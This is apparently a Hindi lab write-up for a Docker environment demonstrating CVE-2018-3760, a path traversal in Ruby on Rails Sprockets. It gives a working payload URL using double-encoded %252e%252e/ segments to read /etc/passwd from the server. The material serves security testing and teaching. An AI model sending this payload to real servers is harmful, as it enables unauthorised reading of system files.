
CVE-2018-3760 पथ ट्रैवर्सल को Ruby on Rails Sprockets में प्रदर्शित करने वाला डॉकर-आधारित लैब, सुरक्षा परीक्षण और शिक्षा के लिए POC और वातावरण सेटअप के साथ।
Ruby On Rails एक प्रसिद्ध Ruby वेब डेवलपमेंट फ्रेमवर्क है, जो विकास वातावरण में Sprockets को एक स्थैतिक फ़ाइल सर्वर के रूप में उपयोग करता है। Sprockets एक Ruby लाइब्रेरी है जो स्थैतिक संसाधन फ़ाइलों को संकलित और वितरित करती है।
Sprockets 3.7.1 और उससे निचले संस्करणों में द्वितीयक डिकोडिंग के कारण एक पथ ट्रैवर्सल भेद्यता है। एक हमलावर %252e%252e/ का उपयोग करके रूट निर्देशिका तक पहुंच सकता है और लक्ष्य सर्वर पर किसी भी फ़ाइल को पढ़ या निष्पादित कर सकता है।
संदर्भ लिंक:
निम्न कमांड दर्ज करें:
docker-compose up -d
http://your-ip:3000 पर जाएं और आप स्वागत पृष्ठ देखेंगे।
सीधे http://your-ip:3000/assets/file:%2f%2f/etc/passwd पर जाने से एक त्रुटि उत्पन्न होगी, क्योंकि फ़ाइल /etc/passwd अनुमत निर्देशिका में नहीं है।

हम त्रुटि पृष्ठ से अनुमत निर्देशिकाओं की एक सूची प्राप्त कर सकते हैं। बस उनमें से एक चुनें, जैसे /usr/src/blog/app/assets/images, फिर मूल निर्देशिका पर जाने के लिए %252e%252e/ का उपयोग करें, और अंत में फ़ाइल /etc/passwd पढ़ें:
http://your-ip:3000/assets/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd
